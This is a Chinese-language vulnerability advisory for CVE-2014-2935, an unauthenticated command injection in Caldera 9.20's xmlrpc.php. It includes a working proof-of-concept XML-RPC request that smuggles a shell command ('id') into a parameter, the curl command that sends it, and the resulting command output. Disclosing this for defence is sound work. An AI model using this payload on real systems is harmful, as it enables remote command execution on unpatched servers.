发布日期:2014-05-07
更新日期:2014-05-10
受影响系统:
Caldera Caldera 9.20
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 67252
CVE(CAN) ID: CVE-2014-2935
Caldera是RIP软件、色彩管理软件、工作流软件。
Caldera 9.20及更早版本没有正确删除OS命令内使用的某些元素, '/costview3/xmlrpc_server/xmlrpc.php' 脚本存在命令执行漏洞,未经身份验证的远程用户提交特制的PHP XMLRPC请求即可触发此漏洞,导致执行OS命令。
<*来源:Thomas Fischer
Markus Wulftange
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Example:
$ cat get_cutter_tools.xml
<?phpxml version="1.0"?>
<methodCall>
<methodName>xmlrpc.get_cutter_tools_xmlrpc</methodName>
<params>
<param><value><string>cutter_name</string></value></param>
<param><value><string>; echo
"<CalderaInfo><methods><item><type>`id`</type></item></methods></CalderaInfo
>"</string></value></param>
</params>
</methodCall>
$ curl --data @get_cutter_tools.xml <host>/costview3/xmlrpc_server/xmlrpc.php
<?phpxml version="1.0"?>
<methodResponse>
<params>
<param>
<value><struct>
<member><name>get_cutter_tools_xmlrpc</name>
<value><array>
<data>
<value><string>uid=1002(caldera) gid=1001(caldera)
groups=1001(caldera),4(adm),7(lp),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),46(plugdev),103
(fuse),104(scanner),109(netdev)</string></value>
</data>
</array></value>
</member>
</struct></value>
</param>
</params>
</methodResponse>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Caldera
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: